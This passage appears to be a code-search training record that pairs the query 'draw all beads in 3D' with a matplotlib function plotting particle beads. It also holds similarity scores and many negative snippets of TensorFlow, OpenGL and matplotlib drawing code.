the current\n # state.\n self._net_outputs = self.online_convnet(self.state_ph,\n self.num_quantile_samples)\n # Shape of self._net_outputs.quantile_values:\n # num_quantile_samples x num_actions.\n # e.g. if num_actions is 2, it might look something like this:\n # Vals for Quantile .2 Vals for Quantile .4 Vals for Quantile .6\n # [[0.1, 0.5], [0.15, -0.3], [0.15, -0.2]]\n # Q-values = [(0.1 + 0.15 + 0.15)/3, (0.5 + 0.15 + -0.2)/3].\n self._q_values = tf.reduce_mean(self._net_outputs.quantile_values, axis=0)\n self._q_argmax = tf.argmax(self._q_values, axis=0)\n self._policy_logits = tf.nn.softmax(self._q_values / self.tau, axis=0)\n self._stochastic_action = tf.random.categorical(\n self._policy_logits[None, Ellipsis],\n num_samples=1,\n dtype=tf.int32)[0][0]\n\n self._replay_net_outputs = self.online_convnet(self._replay.states,\n self.num_tau_samples)\n # Shape: (num_tau_samples x batch_size) x num_actions.\n self._replay_net_quantile_values = self._replay_net_outputs.quantile_values\n self._replay_net_quantiles = self._replay_net_outputs.quantiles\n\n # Do the same for next states in the replay buffer.\n self._replay_net_target_outputs = self.target_convnet(\n self._replay.next_states, self.num_tau_prime_samples)\n # Shape: (num_tau_prime_samples x batch_size) x num_actions.\n vals = self._replay_net_target_outputs.quantile_values\n self._replay_net_target_quantile_values = vals\n\n # Compute Q-values which are used for action selection for the states and\n # next states in the replay buffer.\n target_next_action = self.target_convnet(self._replay.next_states,\n self.num_quantile_samples)\n target_action = self.target_convnet(self._replay.states,\n self.num_quantile_samples)\n\n # Shape: (num_quantile_samples x batch_size) x num_actions.\n target_next_quantile_values_action = target_next_action.quantile_values\n # Shape: num_quantile_samples x batch_size x num_actions.\n target_next_quantile_values_action = tf.reshape(\n target_next_quantile_values_action,\n [self.num_quantile_samples, self._replay.batch_size, self.num_actions])\n\n # Shape: (num_quantile_samples x batch_size) x num_actions.\n target_quantile_values_action = target_action.quantile_values\n # Shape: num_quantile_samples x batch_size x num_actions.\n target_quantile_values_action = tf.reshape(target_quantile_values_action,\n [self.num_quantile_samples,\n self._replay.batch_size,\n self.num_actions])\n # Shape: batch_size x num_actions.\n self._replay_next_target_q_values = tf.squeeze(tf.reduce_mean(\n target_next_quantile_values_action, axis=0))\n self._replay_target_q_values = tf.squeeze(tf.reduce_mean(\n target_quantile_values_action, axis=0))\n\n self._replay_next_qt_argmax = tf.argmax(\n self._replay_next_target_q_values, axis=1)", "def build_resnet152(self):\n use_batch_norm = self.use_batch_norm\n\n imgs = tf.placeholder(tf.float32, [self.batch_size]+self.img_shape)\n is_train = tf.placeholder(tf.bool)\n\n conv1_feats = convolution(imgs, 7, 7, 64, 2, 2, 'conv1')\n conv1_feats = batch_norm(conv1_feats, 'bn_conv1', is_train, use_batch_norm)\n conv1_feats = nonlinear(conv1_feats, 'relu')\n pool1_feats = max_pool(conv1_feats, 3, 3, 2, 2, 'pool1')\n\n res2a_feats = self.basic_block(pool1_feats, 'res2a', 'bn2a', is_train, use_batch_norm, 64, 1)\n res2b_feats = self.basic_block2(res2a_feats, 'res2b', 'bn2b', is_train, use_batch_norm, 64)\n res2c_feats = self.basic_block2(res2b_feats, 'res2c', 'bn2c', is_train, use_batch_norm, 64)\n \n res3a_feats = self.basic_block(res2c_feats, 'res3a', 'bn3a', is_train, use_batch_norm, 
128) \n temp = res3a_feats\n for i in range(1, 8):\n temp = self.basic_block2(temp, 'res3b'+str(i), 'bn3b'+str(i), is_train, use_batch_norm, 128)\n res3b7_feats = temp\n \n res4a_feats = self.basic_block(res3b7_feats, 'res4a', 'bn4a', is_train, use_batch_norm, 256)\n temp = res4a_feats\n for i in range(1, 36):\n temp = self.basic_block2(temp, 'res4b'+str(i), 'bn4b'+str(i), is_train, use_batch_norm, 256)\n res4b35_feats = temp\n\n res5a_feats = self.basic_block(res4b35_feats, 'res5a', 'bn5a', is_train, use_batch_norm, 512)\n res5b_feats = self.basic_block2(res5a_feats, 'res5b', 'bn5b', is_train, use_batch_norm, 512)\n res5c_feats = self.basic_block2(res5b_feats, 'res5c', 'bn5c', is_train, use_batch_norm, 512)\n\n res5c_feats_flat = tf.reshape(res5c_feats, [self.batch_size, 49, 2048])\n self.conv_feats = res5c_feats_flat\n self.conv_feat_shape = [49, 2048]\n self.num_ctx = 49 \n self.dim_ctx = 2048\n\n self.imgs = imgs\n self.is_train = is_train", "def __call__(self, x, is_training, nfilt=32, reuse=False):\n with tf.variable_scope(self.name):\n x = tf.reshape(x, [-1, self.input_dim, self.input_dim, self.channels])\n\n # attnh1 = unet_conv(x, nfilt*1, 'attnh1', reuse, is_training, use_batch_norm=False)\n # attn1 = unet_conv_t(attnh1, None, 1, 'attn1', reuse, is_training, activation=tf.nn.tanh)\n\n # attnh2 = unet_conv(attnh1, nfilt*2, 'attnh2', reuse, is_training)\n # attn2 = unet_conv_t(attnh2, None, nfilt*2, 'attn2_1', reuse, is_training)\n # attn2 = unet_conv_t(attn2, None, 1, 'attn2_2', reuse, is_training, activation=tf.nn.tanh)\n\n # attnh3 = unet_conv(attnh2, nfilt*4, 'attnh3', reuse, is_training)\n # attn3 = unet_conv_t(attnh3, None, nfilt*4, 'attn3_1', reuse, is_training)\n # attn3 = unet_conv_t(attn3, None, nfilt*2, 'attn3_2', reuse, is_training)\n # attn3 = unet_conv_t(attn3, None, 1, 'attn3_3', reuse, is_training, activation=tf.nn.tanh)\n\n # salience = tf.concat([attn1, attn2, attn3], 3)\n # salience = conv(salience, 1, 'salience', s=1, reuse=reuse)\n # salience = tf.reshape(salience, (-1, self.input_dim*self.input_dim*1))\n # salience = tf.nn.softmax(salience)\n # salience = tf.reshape(salience, (-1, self.input_dim,self.input_dim,1))\n\n h1 = unet_conv(x, nfilt*1, 'h1', reuse, is_training, use_batch_norm=False)\n h2 = unet_conv(h1, nfilt*2, 'h2', reuse, is_training)\n h3 = unet_conv(h2, nfilt*4, 'h3', reuse, is_training)\n out = unet_conv(h3, 1, 'out', reuse, is_training, use_batch_norm=False, activation=None)\n\n return out" ]
[ "0.68114513", "0.6745461", "0.67398894", "0.67094636", "0.6685526", "0.6679833", "0.66453695", "0.6631616", "0.65937024", "0.65893584", "0.65746665", "0.6562869", "0.6550034", "0.6546586", "0.65442574", "0.6542558", "0.65119946", "0.64806116", "0.64779437", "0.64562774", "0.6443894", "0.6441079", "0.6440008", "0.6426602", "0.6425736", "0.6424125", "0.6416772", "0.6413305", "0.63934016", "0.6384428", "0.63402045", "0.63346297", "0.6332372", "0.63187844", "0.6313421", "0.6307618", "0.63074756", "0.630579", "0.63022643", "0.63011134", "0.62942654", "0.62829876", "0.62749976", "0.6249788", "0.623691", "0.62365603", "0.62336725", "0.6229006", "0.62257534", "0.6218384", "0.6214259", "0.6211024", "0.621091", "0.62016094", "0.6198679", "0.6193147", "0.61841184", "0.6183229", "0.6179281", "0.6177996", "0.6173619", "0.61689395", "0.61672324", "0.61610174", "0.61585397", "0.61572045", "0.61458635", "0.6144231", "0.6135203", "0.61314416", "0.612922", "0.61262155", "0.6124517", "0.61212504", "0.6119152", "0.6114462", "0.6109514", "0.61090887", "0.61090887", "0.610567", "0.610391", "0.61037153", "0.6103452", "0.61021143", "0.60964024", "0.60903925", "0.6090173", "0.6086748", "0.6083789", "0.6083452", "0.60790884", "0.60691595", "0.60658145", "0.60587966", "0.60579634", "0.6055592", "0.60536504", "0.6052069", "0.6052007", "0.6048691", "0.60475904" ]
0.0
-1
draw all beads in 3D
def draw_beads_3d(ax,beads):
    nslice,nptcl,ndim = beads.shape
    com = beads.mean(axis=0) # center of mass of each particle, used to label the particles only
    ptcls = []
    for iptcl in range(nptcl):
        mypos = beads[:,iptcl,:] # all time slices for particle iptcl
        pos = np.insert(mypos,0,mypos[-1],axis=0) # close beads
        line = ax.plot(pos[:,0],pos[:,1],pos[:,2],marker='o') # draw particle
        text = ax.text(com[iptcl,0],com[iptcl,1],com[iptcl,2],'ptcl %d' % iptcl,fontsize=20) # label particle
        ptcls.append( (line,text) )
    return ptcls
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def render_wireframe_3d(self, **kwds):\n wireframe = [];\n for l in self.lines:\n l_coords = self.coordinates_of(l)\n wireframe.append( line3d(l_coords, **kwds))\n for a in self.arrows:\n a_coords = self.coordinates_of(a)\n wireframe.append(arrow3d(a_coords[0], a_coords[1], **kwds))\n return sum(wireframe)", "def plot3d(self):\n plot_rupture_wire3d(self)", "def on_draw( self ):\r\n self.clear()\r\n self.setup_3D()\r\n print \"DEBUG:\" , \"There are\" , len( self.renderlist ) , \"items in 'self.renderlist'\"\r\n for obj in self.renderlist:\r\n obj.draw()", "def plot_surface_3D(self, length = 30, fps = 30, **kwargs):\n fig = utils.get_figure(scale = 3)\n ax = fig.add_subplot(111, projection = '3d')\n\n # surface_x = self.xi_1_mesh\n # surface_y = self.xi_2_mesh\n # surface_x, surface_y, surface_z = self.surface()\n xyz = self.surface()\n\n # surface_x, surface_y = np.meshgrid(surface_x, surface_y)\n\n # print(np.shape(surface_x))\n # print(np.shape(surface_y))\n # print(np.shape(surface_z))\n\n control_points_x = np.array([control_point[0] for control_point in self.control_net.values()])\n control_points_y = np.array([control_point[1] for control_point in self.control_net.values()])\n control_points_z = np.array([control_point[2] for control_point in self.control_net.values()])\n\n # x_min = min(np.min(surface_x), np.min(control_points_x))\n # x_max = max(np.max(surface_x), np.max(control_points_x))\n # x_range = np.abs(x_max - x_min)\n #\n # y_min = min(np.min(surface_y), np.min(control_points_y))\n # y_max = max(np.max(surface_y), np.max(control_points_y))\n # y_range = np.abs(y_max - y_min)\n #\n # z_min = min(np.min(surface_z), np.min(control_points_z))\n # z_max = max(np.max(surface_z), np.max(control_points_z))\n # z_range = np.abs(z_max - z_min)\n #\n # ax.set_xlim(x_min - 0.05 * x_range, x_max + 0.05 * x_range)\n # ax.set_ylim(y_min - 0.05 * y_range, y_max + 0.05 * y_range)\n # ax.set_zlim(z_min - 0.05 * z_range, z_max + 0.05 * z_range)\n\n ax.scatter(control_points_x, control_points_y, control_points_z, depthshade = False, **CONTROL_POLYGON_KWARGS)\n\n # print(np.max(surface_x), np.max(surface_y), np.max(surface_z))\n # print(np.min(surface_x), np.min(surface_y), np.min(surface_z))\n # print(surface_x)\n # print(surface_y)\n # print(surface_z)\n xyz = np.reshape(xyz, (-1, 3))\n print(xyz.shape)\n x, y, z = xyz[:, 0], xyz[:, 1], xyz[:, 2]\n ax.scatter(x, y, z)\n # ax.plot_trisurf(\n # x, y, z,\n # cmap = plt.get_cmap('viridis'),\n # linewidth = 0,\n # antialiased = True,\n # )\n # ax.plot_surface(surface_x, surface_y, surface_z, rstride = 1, cstride = 1)\n # ax.plot_trisurf(surface_x, surface_y, surface_z)\n # ax.plot_trisurf(surface_x, surface_y, surface_z, **CURVE_KWARGS)\n\n ax.axis('off')\n\n ax.view_init(elev = 45, azim = 0) # note that this resets ax.dist to 10, so we can't use it below\n ax.dist = 7.5 # default is 10, so zoom in a little because there's no axis to take up the rest of the space\n\n plt.show()\n utils.save_current_figure(**kwargs)\n\n ### ANIMATION ###\n\n frames = length * fps\n\n writer = anim.writers['ffmpeg'](fps = fps, bitrate = 2000) # don't need a very high bitrate\n\n def animate(frame):\n print(frame, frames, frame / frames)\n ax.azim = 360 * frame / frames # one full rotation\n return [] # must return the list of artists we modified (i.e., nothing, since all we did is rotate the view)\n\n ani = anim.FuncAnimation(fig, animate, frames = frames, blit = True)\n ani.save(f\"{os.path.join(kwargs['target_dir'], kwargs['name'])}.mp4\", writer = writer)\n\n 
plt.close()", "def draw(self, fig, ax):\n\n\t\tpoints = self.apply_transformations() \n\t\tax.scatter3D(points[:, 0], points[:, 1], points[:, 2])\n\n\t\t# cube polygons collection\n\t\tverts = [\n\t\t\t[points[0], points[1], points[2], points[3]],\n\t\t\t[points[4], points[5], points[6], points[7]], \n\t\t\t[points[0], points[1], points[5], points[4]], \n\t\t\t[points[2], points[3], points[7], points[6]], \n\t\t\t[points[1], points[2], points[6], points[5]],\n\t\t\t[points[4], points[7], points[3], points[0]]\n\t\t]\n\t\t\n\t\t# render polygons\n\t\tax.add_collection3d(Poly3DCollection(verts, \n\t\tfacecolors='blue', linewidths=1, edgecolors='b', alpha=0.3))", "def draw_3d(self, win, x):\r\n c = 200 / (1 + self.length * self.length * 0.00001) # cool trick to make the color darker in the distance\r\n color = (c, c, c)\r\n\r\n height = game_settings.TILE / (self.length / 600) # The original formula of this was:\r\n # visible_height = true_height / distance\r\n # since we're not in meters but in pixel, 600 is an arbitrary\r\n # number in order to make the formula working.\r\n y = game_settings.HEIGHT / 2 - height / 2\r\n pygame.draw.rect(win, color, (x, y, game_settings.RAY_WIDTH, height))", "def draw3d(self, zoom):\n # For \"disappearing\" animation\n # For all balls except white and black\n if ((self.number == 0 and self.visible == False) or (self.number == 8 and self.visible == False)) == False:\n\n # Set position of light source because it depends on the position of the ball\n light_position = [zoom * (self.x - 200.0), zoom * (self.y + 200.0), zoom * 200.0, 1.0]\n light_direction = [zoom * self.x, zoom * self.y, 0.0, 1.0]\n\n glLightfv(GL_LIGHT0, GL_POSITION, light_position)\n glLightfv(GL_LIGHT0, GL_SPOT_DIRECTION, light_direction)\n\n # Turn on textures\n glEnable(GL_TEXTURE_2D)\n glBindTexture(GL_TEXTURE_2D, self.texture)\n\n # Here we move, rotate and draw the ball\n glPushMatrix()\n glScalef(zoom, zoom, zoom)\n glTranslatef(self.x, self.y, 0.0)\n glMultMatrixd(self.matrix)\n if self.radius > 1.0:\n graphicsBall3D(self.radius)\n glPopMatrix()\n\n # Turn off textures\n glDisable(GL_TEXTURE_2D)", "def setup_3D( self ):\r\n # ~ Modes and Flags ~\r\n # Use 'GL_DEPTH_TEST' to ensure that OpenGL maintains a sensible drawing order for polygons no matter the viewing angle\r\n glEnable( GL_DEPTH_TEST ) # Do these setup functions really have to be run every single frame? 
# TODO: Try moving these to the '__init__' , see what happens\r\n # glEnable( GL_CULL_FACE ) # Uncomment to preform backface culling # This might erase arrowheads if they are away-facing!\r\n # ~ View Frustum Setup ~\r\n glMatrixMode( GL_PROJECTION )\r\n glLoadIdentity()\r\n gluPerspective( 70 , self.width / float( self.height ) , 0.1 , 200 )\r\n # ~ View Direction Setup ~\r\n glMatrixMode( GL_MODELVIEW )\r\n glLoadIdentity()\r\n gluLookAt( *self.camera )", "def drawCurve3D(xlist, ylist, zlist):\n dislin.curv3d(xlist,ylist,zlist,len(xlist))", "def drawCube( self ):\n glBegin(GL_QUADS);\n mTexture(0.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n mTexture(1.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n mTexture(1.0, 1.0); glVertex3f( 1.0, 1.0, 1.0);\n mTexture(0.0, 1.0); glVertex3f(-1.0, 1.0, 1.0);\n mTexture(1.0, 0.0); glVertex3f(-1.0, -1.0, -1.0);\n mTexture(1.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n mTexture(0.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n mTexture(0.0, 0.0); glVertex3f( 1.0, -1.0, -1.0);\n mTexture(0.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n mTexture(0.0, 0.0); glVertex3f(-1.0, 1.0, 1.0);\n mTexture(1.0, 0.0); glVertex3f( 1.0, 1.0, 1.0);\n mTexture(1.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n mTexture(1.0, 1.0); glVertex3f(-1.0, -1.0, -1.0);\n mTexture(0.0, 1.0); glVertex3f( 1.0, -1.0, -1.0);\n mTexture(0.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n mTexture(1.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n mTexture(1.0, 0.0); glVertex3f( 1.0, -1.0, -1.0);\n mTexture(1.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n mTexture(0.0, 1.0); glVertex3f( 1.0, 1.0, 1.0);\n mTexture(0.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n mTexture(0.0, 0.0); glVertex3f(-1.0, -1.0, -1.0);\n mTexture(1.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n mTexture(1.0, 1.0); glVertex3f(-1.0, 1.0, 1.0);\n mTexture(0.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n glEnd()", "def setBorder3D():\n dislin.box3d()", "def axis3D(xlow,xhigh,xfirst,xstep,ylow,yhigh,yfirst,ystep,\\\n zlow,zhigh,zfirst,zstep):\n dislin.graf3d(xlow,xhigh,xfirst,xstep,ylow,yhigh,yfirst,ystep,\\\n zlow,zhigh,zfirst,zstep)", "def targets(self):\n self.renderer.begin_rendering(\"targets\")\n for target in self.targets:\n self.renderer.draw_rect_3d(target, 10, 10, True, self.renderer.blue())\n self.renderer.end_rendering()", "def visualize_3d(grbdir,x, y, z, t, thetax, thetay, name):\n # Set ax.azim and ax.elev to ra, dec\n global runconf\n\n from mpl_toolkits.mplot3d import Axes3D\n fig = plt.figure()\n plt.suptitle(r\"Visualisation of {name} in 3d:$\\theta_x$={tx:0.1f},$\\theta_y$={ty:0.1f}\".format(name=name, tx=thetax, ty=thetay))\n # Z\n ax = plt.subplot(2, 2, 1, projection='3d')\n plot_xyzt(grbdir,ax, x, y, z, t)\n ax.azim = z.ra.deg\n ax.elev = z.dec.deg\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_zticklabels([])\n add_satellite(ax, x, y, z)\n ax.set_title(\"View from CZTI pointing (z)\")\n\n # Transient\n ax = plt.subplot(2, 2, 2, projection='3d')\n plot_xyzt(grbdir,ax, x, y, z, t)\n ax.azim = t.ra.deg\n ax.elev = t.dec.deg\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_zticklabels([])\n add_satellite(ax, x, y, z)\n ax.set_title(\"View from nominal \\n transient direction\")\n\n # X\n ax = plt.subplot(2, 2, 3, projection='3d')\n plot_xyzt(grbdir,ax, x, y, z, t)\n ax.azim = x.ra.deg\n ax.elev = x.dec.deg\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_zticklabels([])\n add_satellite(ax, x, y, z)\n ax.set_title(\"View from CZTI X axis\")\n\n # Z\n ax = plt.subplot(2, 2, 4, projection='3d')\n plot_xyzt(grbdir,ax, x, y, z, t)\n ax.azim = y.ra.deg\n 
ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_zticklabels([])\n add_satellite(ax, x, y, z)\n ax.set_title(\"View from CZTI Y axis\")\n\n return", "def draw():\n global trackball, flashlight, \\\n vertex_buffer, normal_buffer, \\\n colors, color_buffer, selected_face, add_face, \\\n shaders\n\n # Clear the rendering information.\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n # Clear the transformation stack.\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n glPushMatrix()\n\n # Transform the objects drawn below by a rotation.\n trackball.glRotate()\n\n # * * * * * * * * * * * * * * * *\n # Draw all the triangular facets.\n glUseProgram(shaders)\n\n h_vertex = glGetAttribLocation(shaders,'vertex')\n h_normal = glGetAttribLocation(shaders,'normal')\n h_color = glGetAttribLocation(shaders,'color')\n h_eye = glGetUniformLocation(shaders,'eye')\n h_light = glGetUniformLocation(shaders,'light')\n\n # all the vertex positions\n glEnableVertexAttribArray(h_vertex)\n glBindBuffer (GL_ARRAY_BUFFER, vertex_buffer)\n glVertexAttribPointer(h_vertex, 3, GL_FLOAT, GL_FALSE, 0, None)\n \n # all the vertex normals\n glEnableVertexAttribArray(h_normal)\n glBindBuffer (GL_ARRAY_BUFFER, normal_buffer)\n glVertexAttribPointer(h_normal, 3, GL_FLOAT, GL_FALSE, 0, None)\n\n # all the face vertex colors\n glEnableVertexAttribArray(h_color)\n glBindBuffer (GL_ARRAY_BUFFER, color_buffer)\n\n if selected_face and add_face:\n # paint that face's vertices Green\n rgb_selected = [0.7,0.9,0.6] #GREEN\n for change in range(9):\n colors[selected_face.id * 9 + change] = rgb_selected[change % 3]\n # update the color buffer\n glBufferData (GL_ARRAY_BUFFER, len(colors)*4, \n (c_float*len(colors))(*colors), GL_STATIC_DRAW)\n add_face = False\n\n glVertexAttribPointer(h_color, 3, GL_FLOAT, GL_FALSE, 0, None)\n \n # position of the flashlight\n light = flashlight.rotate(vector(0.0,0.0,1.0));\n glUniform3fv(h_light, 1, (2.0*radius*light).components())\n\n # position of the viewer's eye\n eye = trackball.recip().rotate(vector(0.0,0.0,1.0))\n glUniform3fv(h_eye, 1, eye.components())\n\n glDrawArrays (GL_TRIANGLES, 0, len(face.instances) * 3)\n\n glDisableVertexAttribArray(h_vertex)\n glDisableVertexAttribArray(h_normal)\n glDisableVertexAttribArray(h_color)\n\n glPopMatrix()\n\n # Render the scene.\n glFlush()\n\n glutSwapBuffers()", "def draw_flower_bed():\n turtle.up()\n turtle.left(180)\n turtle.forward(200)\n turtle.right(180)\n turtle.down()\n for x in range(3):\n draw_flower_advanced()", "def drawBoundingBoxes(ax, x, y, z, w, l, h, r, col='b', linewidth=2):\n # Do this, because we have center point\n l = l / 2.0\n w = w / 2.0\n\n # Calculate corner locations with rotation\n x1 = x + (w * math.cos(r) + l * math.sin(r))\n y1 = y + (-w * math.sin(r) + l * math.cos(r))\n x2 = x + (-w * math.cos(r) + l * math.sin(r))\n y2 = y + (+w * math.sin(r) + l * math.cos(r))\n x3 = x + (-w * math.cos(r) - l * math.sin(r))\n y3 = y + (w * math.sin(r) - l * math.cos(r))\n x4 = x + (w * math.cos(r) - l * math.sin(r))\n y4 = y + (-w * math.sin(r) - l * math.cos(r))\n\n # Bottom rectangle\n ax.plot3D([x3, x4], [y3, y4], [z, z], col, linewidth=2, alpha=0.8)\n ax.plot3D([x2, x1], [y2, y1], [z, z], col, linewidth=2, alpha=0.8)\n ax.plot3D([x3, x2], [y3, y2], [z, z], col, linewidth=2, alpha=0.8)\n ax.plot3D([x4, x1], [y4, y1], [z, z], col, linewidth=2, alpha=0.8)\n\n # Top rectangle\n ax.plot3D([x3, x4], [y3, y4], [z+h, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x2, x1], [y2, y1], [z+h, z+h], col, linewidth=2, alpha=0.8)\n 
ax.plot3D([x3, x2], [y3, y2], [z+h, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x4, x1], [y4, y1], [z+h, z+h], col, linewidth=2, alpha=0.8)\n\n # Vertical lines\n ax.plot3D([x1, x1], [y1, y1], [z, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x2, x2], [y2, y2], [z, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x3, x3], [y3, y3], [z, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x4, x4], [y4, y4], [z, z+h], col, linewidth=2, alpha=0.8)", "def draw_layers(self):\n\t\tfor z in xrange(0,16):\n\t\t\t#create surface for this layer\n\t\t\tsrf = pygame.Surface((16,128))\n\t\t\tfor x in xrange(0,16):\n\t\t\t\tfor y in xrange(0,128):\n\t\t\t\t\tv = self.data[ self.xyz_to_offset( x,y,z) ]\n\t\t\t\t\tif v != 0:\n\t\t\t\t\t\tsrf.fill( BLOCKS.get(v, [0,0])[1], \t(x, 127 -y, 1, 1 ))\n\t\t\t#save layer to dict for this chunk\n\t\t\tself.layers[z] = srf", "def draw(self):\n self._view.clear()\n for h in range(len(self._bricks)):\n self._bricks[h].draw(self._view)\n \n self._paddle.draw(self._view)\n \n for w in self._FP_list:\n w.draw(self._view)\n \n # draw ball if not None\n if not self._ball is None:\n self._ball.draw(self._view)", "def visualize_in_3d(self,**kwargs):\n fig = plt.figure(figsize=(7,7))\n ax = fig.add_subplot(111, projection='3d')\n\n points = np.vstack([\n c.to_matrix() for c in self.contours if c.inclusion\n ])\n points[:,:2] = points[:,:2] * self.scan.pixel_spacing\n\n # Center the points at the origin for \n # spherical coordinates conversion.\n points = points - points.mean(axis=0)\n\n # Triangulate the azimuth and zenith transformation.\n azimuth = np.arctan2(points[:,1],points[:,0])\n zenith = np.arccos(points[:,2] / np.linalg.norm(points,axis=1))\n azi_zen = np.c_[azimuth.flatten(),zenith.flatten()]\n triangles = Delaunay(azi_zen).simplices\n\n # Start the points at 0 on every axis.\n # This lets the axis ticks to be interpreted as length in mm.\n points = points - points.min(axis=0)\n\n ax.set_xlabel('length (mm)')\n ax.set_ylabel('length (mm)')\n ax.set_zlabel('length (mm)')\n\n # Plot the points.\n ax.plot_trisurf(points[:,0], points[:,1], points[:,2],\n triangles=triangles, **kwargs)\n plt.show()", "def draw_flower_bed():\n turtle.up()\n turtle.left(180)\n turtle.forward(200)\n turtle.right(180)\n turtle.down()\n for flower in range(3):\n draw_flower_advanced()", "def draw():", "def drawCube( self ):\n glBegin(GL_QUADS);\n glTexCoord2f(0.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f( 1.0, 1.0, 1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f(-1.0, 1.0, 1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f(-1.0, -1.0, -1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n glTexCoord2f(0.0, 0.0); glVertex3f( 1.0, -1.0, -1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n glTexCoord2f(0.0, 0.0); glVertex3f(-1.0, 1.0, 1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f( 1.0, 1.0, 1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f(-1.0, -1.0, -1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f( 1.0, -1.0, -1.0);\n glTexCoord2f(0.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f( 1.0, -1.0, -1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f( 1.0, 1.0, 1.0);\n glTexCoord2f(0.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n glTexCoord2f(0.0, 0.0); glVertex3f(-1.0, -1.0, -1.0);\n 
glTexCoord2f(1.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f(-1.0, 1.0, 1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n glEnd()", "def draw( self ):\r\n print \"Drawing cuboid!\"\r\n glTranslated( *self.pos3D ) # This moves the origin of drawing , so that we can use the above coordinates at each draw location\r\n if self.rotnByOGL:\r\n glRotated( self.thetaDeg , *self.rotAxis )\r\n # glTranslated( 0 , 0 , 0 ) # This moves the origin of drawing , so that we can use the above coordinates at each draw location\r\n print \"DEBUG:\" , \"Translated to\" , 0 , 0 , 0\r\n glColor3ub( *self.color ) # Get the color according to the voxel type\r\n print \"DEBUG:\" , \"Set color to\" , self.color\r\n pyglet.graphics.draw_indexed( \r\n 8 , # --------------------- Number of seqential triplet in vertex list\r\n GL_QUADS , # -------------- Draw quadrilaterals\r\n self.indices , # ---------- Indices where the coordinates are stored\r\n ( 'v3f' , self.vertX ) # vertex list , OpenGL offers an optimized vertex list object , but this is not it\r\n ) # 'v3i' # This is for integers I suppose!\r\n \r\n glColor3ub( *self.colorLine )\r\n pyglet.gl.glLineWidth( 3 )\r\n pyglet.graphics.draw_indexed( \r\n 8 , # --------------------- Number of seqential triplet in vertex list\r\n GL_LINES , # -------------- Draw quadrilaterals\r\n self.linDices , # ---------- Indices where the coordinates are stored\r\n ( 'v3f' , self.vertX ) # vertex list , OpenGL offers an optimized vertex list object , but this is not it\r\n ) # 'v3i' # This is for integers I suppose!\r\n \r\n print \"DEBUG:\" , \"Indices\"\r\n print self.indices \r\n print \"DEBUG:\" , \"Vertices\"\r\n print self.vertices \r\n \"\"\" URL: http://pyglet.readthedocs.io/en/pyglet-1.2-maintenance/programming_guide/graphics.html#vertex-lists\r\n \r\n There is a significant overhead in using pyglet.graphics.draw and pyglet.graphics.draw_indexed due to pyglet \r\n interpreting and formatting the vertex data for the video device. Usually the data drawn in each frame (of an animation) \r\n is identical or very similar to the previous frame, so this overhead is unnecessarily repeated.\r\n \r\n A VertexList is a list of vertices and their attributes, stored in an efficient manner that’s suitable for direct \r\n upload to the video card. 
On newer video cards (supporting OpenGL 1.5 or later) the data is actually stored in video memory.\r\n \"\"\"\r\n if self.rotnByOGL:\r\n glRotated( -self.thetaDeg , *self.rotAxis )\r\n glTranslated( *np.multiply( self.pos3D , -1 ) ) # Reset the transform coordinates\r\n print \"DEBUG:\" , \"Translated to\" , 0 , 0 , 0\r\n print \"Done drawing!\"", "def draw(self, surface):\n for molecule in self.molecules:\n molecule.draw(surface)", "def plot_3d_object(object_):\n \n # Initialize renderer instance\n r = Renderer()\n\n # Add surfaces and goal regions to the renderer instance\n for surf in object_:\n r.add((object_[surf][0],'b',1))\n if len(object_[surf])>2:\n r.add((object_[surf][2],'r',1))\n r.add((gPoint(-15,-15,-15),'k',1))\n r.show()", "def __drawCube(self):\n self.cubePos = [[[(160, 160), (200, 160), (240, 160)],\n [(160, 200), (200, 200), (240, 200)],\n [(160, 240), (200, 240), (240, 240)]],\n [[(400, 160), (440, 160), (480, 160)],\n [(400, 200), (440, 200), (480, 200)],\n [(400, 240), (440, 